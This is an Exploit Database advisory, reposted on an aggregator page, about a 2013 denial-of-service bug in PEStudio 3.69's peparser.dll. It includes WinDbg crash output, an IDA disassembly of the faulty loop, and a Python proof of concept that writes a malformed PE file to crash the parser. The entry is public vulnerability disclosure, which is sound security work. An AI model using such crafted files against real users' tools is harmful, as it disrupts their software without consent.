PEStudio 3.69 – Denial of Service

• Exploit Database
• 11 阅读

• 作者： Debasish Mandal
  日期： 2013-06-05
• 类别：

  • dos
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/25972/

• # Title: PEStudio Version 3.69 Denial of Service
  # Date: 5th June 2013
  # Author: Debasish Mandal ( https://twitter.com/debasishm89 )
  # Blog : http://www.debasish.in/
  # Software Homepage: http://www.winitor.com/
  # Version: PEStudio Version 3.69
  # Tested on: Windows XP SP2 / Windows 7
  # Vendor Patch : Recently released stable version (v6.91) is not affected.
  
  '''
   
  [+] Affected Module : peparser.dll version 3.69
   
  [+] Crash Point:
   
  (6b4.17c): Access violation - code c0000005 (!!! second chance !!!)
  eax=00000000 ebx=41414141 ecx=013f41d9 edx=013f0080 esi=00000000 edi=00004141
  eip=3001ce70 esp=0012d15c ebp=00a26100 iopl=0 nv up ei pl nz na pe nc
  cs=001bss=0023ds=0023es=0023fs=0038gs=0000 efl=00000206
  *** ERROR: Symbol file could not be found.Defaulted to export symbols for C:\Documents and Settings\debasish mandal\Desktop\Tools\PeStudio369\PeParser.dll - 
  PeParser!PeParser::IPeParserFactory::Destroy+0xf1d0:
  3001ce70 8b510cmov edx,dword ptr [ecx+0Ch] ds:0023:013f41e5=????????
  0:000> u eip
  PeParser!PeParser::IPeParserFactory::Destroy+0xf1d0:
  3001ce70 8b510cmov edx,dword ptr [ecx+0Ch]
  3001ce73 3bdacmp ebx,edx
  3001ce75 7209jbPeParser!PeParser::IPeParserFactory::Destroy+0xf1e0 (3001ce80)
  3001ce77 8b6908mov ebp,dword ptr [ecx+8]
  3001ce7a 03eaadd ebp,edx
  3001ce7c 3bddcmp ebx,ebp
  3001ce7e 720cjbPeParser!PeParser::IPeParserFactory::Destroy+0xf1ec (3001ce8c)
  3001ce80 46inc esi
   
  [+] IDA Pro Snap of the Buggy Function:(Code from peparser.dll version 3.69)
  
  .text:3001CE40 sub_3001CE40proc near ; CODE XREF: sub_30003510+154p
  .text:3001CE40 ; sub_300184D0+4Bp
  .text:3001CE40 mov ecx, [ecx+4]
  .text:3001CE43 xor eax, eax
  .text:3001CE45 testecx, ecx
  .text:3001CE47 jzshort locret_3001CE91
  .text:3001CE49 mov edx, [ecx+1Ch]
  .text:3001CE4C movzx ecx, word ptr [edx+14h]
  .text:3001CE50 lea ecx, [ecx+edx+18h]
  .text:3001CE54 testecx, ecx
  .text:3001CE56 jzshort locret_3001CE91
  .text:3001CE58 testebx, ebx
  .text:3001CE5A jzshort locret_3001CE91
  .text:3001CE5C pushesi
  .text:3001CE5D pushedi
  .text:3001CE5E movzx edi, word ptr [edx+6]
  .text:3001CE62 xor esi, esi
  .text:3001CE64 testedi, edi
  .text:3001CE66 jle short loc_3001CE8F
  .text:3001CE68 pushebp
  .text:3001CE69 lea esp, [esp+0]
  .text:3001CE70
  .text:3001CE70 loc_3001CE70: ; CODE XREF: sub_3001CE40+46j
  .text:3001CE70 mov edx, [ecx+0Ch]<-- Crash
  .text:3001CE73 cmp ebx, edx
  .text:3001CE75 jbshort loc_3001CE80
  .text:3001CE77 mov ebp, [ecx+8]
  .text:3001CE7A add ebp, edx
  .text:3001CE7C cmp ebx, ebp
  .text:3001CE7E jbshort loc_3001CE8C
  .text:3001CE80
  .text:3001CE80 loc_3001CE80: ; CODE XREF: sub_3001CE40+35j
  .text:3001CE80 inc esi
  .text:3001CE81 add ecx, 28h
  .text:3001CE84 cmp esi, edi
  .text:3001CE86 jlshort loc_3001CE70
  .text:3001CE88 pop ebp
  .text:3001CE89 pop edi
  .text:3001CE8A pop esi
  .text:3001CE8B retn
  .text:3001CE8C ; ---------------------------------------------------------------------------
  
  [+] Proof of Concept :
  
  '''
  # /usr/bin/python
  header = "MZ"
  header += "A"*58
  header += "\x80\x00\x00\x00"
  header += "A"*3
  header += "\x0e"
  header += "A"*60
  header += "PE"
  header += "A"*235
  f = open('POC.exe','wb')
  f.write(header)
  f.close()